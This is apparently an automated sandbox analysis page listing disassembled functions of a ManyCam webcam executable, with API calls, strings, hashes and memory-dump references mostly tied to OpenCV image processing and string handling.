Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$?append@?$basic_string@_V12@$?size@?$basic_string@D@2@@std@@D@std@@Myptr@?$basic_string@_U?$char_traits@V?$allocator@$??0?$basic_string@_??1?$basic_string@_?capacity@?$basic_string@_V12@@
String ID:
API String ID: 2582929383-0
Opcode ID: 99d232171a17d203477813e664fcae17ef49d5089341ea70655ec06df161d3e9
Instruction ID: cf8cf326054b3b9829f24e0287d30cae8bbcd3a7b8d77b238681494193127ac1
Opcode Fuzzy Hash: 99d232171a17d203477813e664fcae17ef49d5089341ea70655ec06df161d3e9
Instruction Fuzzy Hash: 62316F75900118EFDB04EF64D844AADBBB6FF98350F00852AF91697390DB349D45CF84

Function 004013A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 261COMMON

Download Yara Rule

APIs

cvCvtColor.CV099(?,?,00000007), ref: 0040147C
cvError.CXCORE099(000000FB,cvCylInitModel,Invalid input frame.,.\src\cyltracker.cpp,00000126), ref: 00401675

Strings

.\src\cyltracker.cpp, xrefs: 004013BD, 00401653, 00401664
Null pointer to tracker context., xrefs: 004013C2
Invalid input frame., xrefs: 00401669
cvCylInitModel, xrefs: 0040166E
Invalid model parameters were specified., xrefs: 00401658

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ColorError
String ID: .\src\cyltracker.cpp$Invalid input frame.$Invalid model parameters were specified.$Null pointer to tracker context.$cvCylInitModel
API String ID: 4088650746-2904168572
Opcode ID: 839d2cbad712c6fb12a95abb139124923537f8022364e14e69f8706239253386
Instruction ID: 1c253823393e59d8f389e9ec3cb6c3af1bef9396372c058acdeb4534553bb085
Opcode Fuzzy Hash: 839d2cbad712c6fb12a95abb139124923537f8022364e14e69f8706239253386
Instruction Fuzzy Hash: 0D81E5B2F04202ABC7027E50D9457DA7BA4FB80794F214E99E9DA711F5F33588718EC9

Function 004F1030 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

fseek.MSVCR80 ref: 004F1097
ftell.MSVCR80 ref: 004F10A4
fseek.MSVCR80 ref: 004F10B8

Strings

zS, xrefs: 004F1236, 004F123E, 004F1242, 004F11A1, 004F11A8, 004F11D3, 004F11DD, 004F11E1, 004F11A7, 004F11AB, 004F11E0, 004F11E4, 004F1241, 004F1245

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: fseek$ftell
String ID: zS
API String ID: 1687442226-3280143790
Opcode ID: e640e00341aeb39dc5ad3ada3b11ef7366c8acaf58e60699a3a6dc06e33046a1
Instruction ID: d51d2314559d3de73f7ebb59d383f0640d42414dd441d265d43309b2b2205bb6
Opcode Fuzzy Hash: e640e00341aeb39dc5ad3ada3b11ef7366c8acaf58e60699a3a6dc06e33046a1
Instruction Fuzzy Hash: 409126B1E00249ABDB04DFD4DC92BFFBB71BF44300F10455AE611AB291DB796901CB99

Function 004D1BE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D1D02
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004D1D45

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

Couldn't activate item., xrefs: 004D1E4F
CPlayList::ActivatePlayList (%s), xrefs: 004D1C12

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Concurrency::cancellation_token_source::~cancellation_token_sourceclock$AllocatorDebugHeap
String ID: CPlayList::ActivatePlayList (%s)$Couldn't activate item.
API String ID: 666216686-3135489573
Opcode ID: 86a6ea1d549f1e14cb2df91f30b70f8bdc6fa07100872fae78ce2dc3a5dbc7fd
Instruction ID: e5225bd3be3d0e3e30ba9f0653f38cf39164d32131126bfff1481db119ea4a1f
Opcode Fuzzy Hash: 86a6ea1d549f1e14cb2df91f30b70f8bdc6fa07100872fae78ce2dc3a5dbc7fd
Instruction Fuzzy Hash: 02A1E770D00208DFDB14DFA9C995BEDBBB1BF09318F20815EE4196B392DB786A45CB94

Function 004C9500 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211COMMON

Download Yara Rule

APIs

Part of subcall function 004AD340: Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 004AD389

wcscpy.MSVCR80 ref: 004C9586
wcscpy.MSVCR80 ref: 004C960C
_Smanip.LIBCPMTD ref: 004C9650
_Smanip.LIBCPMTD ref: 004C969B
fabs.MSVCR80 ref: 004C9759

Strings

ManyCam Video Driver, xrefs: 004C9600
ManyCam Options, xrefs: 004C957A

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Smanipwcscpy$Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::_fabs
String ID: ManyCam Options$ManyCam Video Driver
API String ID: 3043553602-2679671152
Opcode ID: d8f914545a6770cd3ec1de607a9825b7542528df8afbb8bee092f4a7228edef5
Instruction ID: 1960ef59aa6a2aae985edd86a644215036cafca125c540dc4a2acd471f05383e
Opcode Fuzzy Hash: d8f914545a6770cd3ec1de607a9825b7542528df8afbb8bee092f4a7228edef5
Instruction Fuzzy Hash: 65A14275900118DBCB54EF94DD99BEEB7B4BB48304F1081EEE00A67291DB391E98CF68

Function 004B2740 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 210memoryCOMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(00000000,00000000), ref: 004B2816
_DebugHeapAllocator.LIBCPMTD ref: 004B280A

Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE

_DebugHeapAllocator.LIBCPMTD ref: 004B284D
_DebugHeapAllocator.LIBCPMTD ref: 004B287B
_DebugHeapAllocator.LIBCPMTD ref: 004B2926
_DebugHeapAllocator.LIBCPMTD ref: 004B2938

Strings

- PIN Id=%s Name=%s Dir=%s ConnectedTo=%s (%s), xrefs: 004B29AF
ConnectionMediaType:, xrefs: 004B29CD

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$FreeTask
String ID: - PIN Id=%s Name=%s Dir=%s ConnectedTo=%s (%s)$ConnectionMediaType:
API String ID: 2977454536-3767152877
Opcode ID: 7365bd653b06ff7014c07b105e705209bc8ea7cbefe77dba3365ebff6c9963ec
Instruction ID: 9de56078743278097fdae2ef512013b449c6826a7b1472736913757348bad0bc
Opcode Fuzzy Hash: 7365bd653b06ff7014c07b105e705209bc8ea7cbefe77dba3365ebff6c9963ec
Instruction Fuzzy Hash: 77A114719041189FCB29EB65CD84BDEB7B4AF49304F5081DAE00AA7291DB746F88CFA4

Function 004B91B0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

_DebugHeapAllocator.LIBCPMTD ref: 004B91FE

Part of subcall function 004167C0: _DebugHeapAllocator.LIBCPMTD ref: 004167CE

Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 004B921B
_DebugHeapAllocator.LIBCPMTD ref: 004B9286
_DebugHeapAllocator.LIBCPMTD ref: 004B9292
Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::_Scoped_lock.LIBCMTD ref: 004B9346
_DebugHeapAllocator.LIBCPMTD ref: 004B937C

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CManyCamGraphMgr::AddFileInput, xrefs: 004B91DF
FILE%d, xrefs: 004B9262

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::_clock
String ID: CManyCamGraphMgr::AddFileInput$FILE%d
API String ID: 2060279746-2550898069
Opcode ID: 554f504c3c04030db831f41dac86bb6fd15d60918f1d20abac47e38e3ad480d2
Instruction ID: f87271521a58759e14b5fc00be8376ac9ef0cf63084c1a11c79c4c9345c79b8d
Opcode Fuzzy Hash: 554f504c3c04030db831f41dac86bb6fd15d60918f1d20abac47e38e3ad480d2
Instruction Fuzzy Hash: 97616D70901248EFCB04EF95C995BDEBBB4BF14308F10856EF4166B2D2DB786A09CB95

Function 00BA0160 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 130COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,00000000,00000000,00000000), ref: 00BA018C
cvGetErrStatus.GLU32 ref: 00BA0196
cvError.GLU32(000000FF,cvGetRect,Inner function failed.,.\cxarray.cpp,000005C2), ref: 00BA01B5
cvError.GLU32(000000E5,cvGetRect,00C4124F,.\cxarray.cpp,000005C5), ref: 00BA01E3
cvError.GLU32(FFFFFF37,cvGetRect,00C4124F,.\cxarray.cpp,000005CC), ref: 00BA02CD

Strings

.\cxarray.cpp, xrefs: 00BA01A4, 00BA01D2, 00BA02B9
cvGetRect, xrefs: 00BA01AE, 00BA01DC, 00BA02C3
Inner function failed., xrefs: 00BA01A9

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxarray.cpp$Inner function failed.$cvGetRect
API String ID: 483703942-2902011022
Opcode ID: 29295dc49f192f3986c2ed5b8dc9cb15df7ef67cd65529f9f3b57808667b2f51
Instruction ID: 61cab3cd0c226e8b3c1a20d9aa5705719c2302fa317e1f988cd0e9d134848ab1
Opcode Fuzzy Hash: 29295dc49f192f3986c2ed5b8dc9cb15df7ef67cd65529f9f3b57808667b2f51
Instruction Fuzzy Hash: B3414672B45B001FC718EE28DC92F6AB3D2FBD0715F4943ADF691973D6E270A6008691

Function 00BA02E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,00000000,00000000,00000000), ref: 00BA030A
cvGetErrStatus.GLU32 ref: 00BA0314
cvError.GLU32(000000FF,cvGetRows,Inner function failed.,.\cxarray.cpp,000005F6), ref: 00BA0333
cvError.GLU32(000000E5,cvGetRows,00C4124F,.\cxarray.cpp,000005F9), ref: 00BA0361
cvError.GLU32(FFFFFF2D,cvGetRows,00C4124F,.\cxarray.cpp,000005FD), ref: 00BA0439

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

Strings

.\cxarray.cpp, xrefs: 00BA0322, 00BA0350, 00BA0425
Inner function failed., xrefs: 00BA0327
cvGetRows, xrefs: 00BA032C, 00BA035A, 00BA042F

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxarray.cpp$Inner function failed.$cvGetRows
API String ID: 483703942-296020910
Opcode ID: 2eb071271737416ea52fe005f8bd3b38dc84df90ab7eaf72087cccc5c899fbee
Instruction ID: 55b2502d7c58f5750ec398cabb2621f60851bd61f5d14aeb5bd67b6df85da83c
Opcode Fuzzy Hash: 2eb071271737416ea52fe005f8bd3b38dc84df90ab7eaf72087cccc5c899fbee
Instruction Fuzzy Hash: 55415BB2B552116BC700EE2CDCC2925B7E1FB54728B6882BDE914D7382E372E94286D0

Function 00BC6870 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

cvError.GLU32(000000E5,cvClearSeq,00C4124F,.\cxdatastructs.cpp,00000721,?,00BC29B1,00000000,?,?,?,00000000,?), ref: 00BC688F

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvSeqPopMulti.GLU32(?,00000000,?,00000000,?,00BC29B1,00000000,?,?,?,00000000,?), ref: 00BC68A2
cvGetErrStatus.GLU32(00000000,?), ref: 00BC68AA
cvError.GLU32(000000FF,cvClearSet,Inner function failed.,.\cxdatastructs.cpp,00000B27,00000000,?), ref: 00BC68C9

Strings

cvClearSet, xrefs: 00BC68C2
cvClearSeq, xrefs: 00BC6888
.\cxdatastructs.cpp, xrefs: 00BC687E, 00BC68B8
Inner function failed., xrefs: 00BC68BD

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus$Multi
String ID: .\cxdatastructs.cpp$Inner function failed.$cvClearSeq$cvClearSet
API String ID: 1743891190-3576930330
Opcode ID: 7356662b4e18d35a7fa5dc303d9f5635f9ba7dbf4a4a519dea76a1ab755d993c
Instruction ID: 8ab2bd7d076ded7c47beb88bee732759b8874bbd8c65561c2d00e0a3dad2fc14
Opcode Fuzzy Hash: 7356662b4e18d35a7fa5dc303d9f5635f9ba7dbf4a4a519dea76a1ab755d993c
Instruction Fuzzy Hash: 93F02772B8431036DA303A45BC83F4737D4AF11F24F5806F9FA55BA6C3E2D0784101A1

Function 004055D0 Relevance: 13.6, APIs: 9, Instructions: 127COMMON

Download Yara Rule

APIs

cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,FFFFFFFE,?,?,?,00405837,?), ref: 004055E2
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,FFFFFFFE,?,?,?,00405837,?), ref: 004055F4

Part of subcall function 00405430: cvSet.CXCORE099(?,?,?,?,?,?,?,00000000,?,?,00405609,00000000,?,?,?,?), ref: 00405455
Part of subcall function 00405430: _CIcos.MSVCR80 ref: 004054AB
Part of subcall function 00405430: _CIsin.MSVCR80 ref: 004054C0

Part of subcall function 00405430: _CIcos.MSVCR80 ref: 00405513
Part of subcall function 00405430: _CIsin.MSVCR80 ref: 00405528

cvGEMM.CXCORE099(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFE), ref: 00405639
cvSet.CXCORE099(?), ref: 00405662
_CIcos.MSVCR80 ref: 004056A5
_CIsin.MSVCR80 ref: 004056BA
cvGEMM.CXCORE099(?,?), ref: 00405714
cvReleaseMat.CXCORE099(?), ref: 00405721
cvReleaseMat.CXCORE099(?), ref: 0040572E

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: IcosIsin$CreateRelease
String ID:
API String ID: 2556766011-0
Opcode ID: 19b278f26bd2affd4bf5088c6fcf34e39657aa1821ccb0a828da2a4a6fc568fd
Instruction ID: f31050a243995d0c5443df83b4ae895e9b552899debfb7c8d2f859130b8e0e61
Opcode Fuzzy Hash: 19b278f26bd2affd4bf5088c6fcf34e39657aa1821ccb0a828da2a4a6fc568fd
Instruction Fuzzy Hash: 8F416AB0A05701DBD310EF24E98AA1ABBB0FF84704F814D98F5D557296DB31E839CB96

Function 004A7F40 Relevance: 13.6, APIs: 9, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Delete
String ID:
API String ID: 1035893169-0
Opcode ID: 027381e0a8d9cc06f36ac8957b2692d02a27fb112fce139c5847b74b9e663b06
Instruction ID: 84041e226b1c2fd87843b1158a64503d8b67fa0500779cb20a2bc36cc8881071
Opcode Fuzzy Hash: 027381e0a8d9cc06f36ac8957b2692d02a27fb112fce139c5847b74b9e663b06
Instruction Fuzzy Hash: 8D512FB0914209ABEB04EFA4CD56FEEBB74AF14314F20412AF511772D1DB786E44CB69

Function 00403140 Relevance: 13.6, APIs: 9, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00402BB0: cvCreateImage.CXCORE099(?,?,00000008,00000001,?,?,00403181,?,?), ref: 00402BC0
Part of subcall function 00402BB0: cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,00000000,?,0040120F), ref: 00402BD4
Part of subcall function 00402BB0: cvCreateImage.CXCORE099(?,?,00000020,00000003,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BE9
Part of subcall function 00402BB0: cvReleaseImage.CXCORE099(?,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BFE
Part of subcall function 00402BB0: cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C10
Part of subcall function 00402BB0: cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C22

cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,0040120F), ref: 00403198
cvCreateImage.CXCORE099(?,?,80000010,00000001,?,00000000,?,0040120F), ref: 004031AF
cvCreateImage.CXCORE099(?,?,80000010,00000001,?,?,?,?,?,00000000,?,0040120F), ref: 004031C7
cvReleaseImage.CXCORE099(00000000,?,00000000,?,0040120F), ref: 0040321A
cvReleaseImage.CXCORE099(00000004,?,00000000,?,0040120F), ref: 0040322C
cvReleaseImage.CXCORE099(-00000008,?,00000000,?,0040120F), ref: 0040323D
cvReleaseImage.CXCORE099(?,?,00000000,?,0040120F), ref: 00403253
cvReleaseImage.CXCORE099(00000000,?,00000000,?,0040120F), ref: 00403265
cvReleaseImage.CXCORE099(?,?,00000000,?,0040120F), ref: 00403276

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image$Release$Create
String ID:
API String ID: 810653722-0
Opcode ID: 1d98beb3a53aab4c12813adeeefc3e19331db0e6fab2847f039cf9fe8a11b982
Instruction ID: 1a79d18011980f8bb9dda7d5d5bd7389d244d0d6aefedc31b6f3b3b2419f781a
Opcode Fuzzy Hash: 1d98beb3a53aab4c12813adeeefc3e19331db0e6fab2847f039cf9fe8a11b982
Instruction Fuzzy Hash: 0031FAB5901202ABEB109E24DC45B57BB9CFF55302F08447AE904A33C1F379FA59C6A6

Function 004887A0 Relevance: 13.6, APIs: 9, Instructions: 70COMMON

Download Yara Rule

APIs

?erase@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@II@Z.MSVCP80(00000000,744843B1,744843B1,?,?,00488794,744843B1,0049A100,0049A100), ref: 004887D9
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(744843B1,?,?,00488794,744843B1,0049A100,0049A100), ref: 004887E7
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,00488794,744843B1,0049A100,0049A100), ref: 004887F5
?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP80(?,00488794,744843B1,0049A100,0049A100), ref: 00488800
?_Myptr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@IAEPA_WXZ.MSVCP80(?,?,00488794,744843B1,0049A100,0049A100), ref: 00488819
?substr@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBE?AV12@II@Z.MSVCP80(?,00000000,?,?,00488794,744843B1,0049A100,0049A100), ref: 0048882E
??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@ABV01@@Z.MSVCP80(?,?,?,00488794,744843B1,0049A100,0049A100), ref: 0048884B
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP80(?,?,00488794,744843B1,0049A100,0049A100), ref: 0048885B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

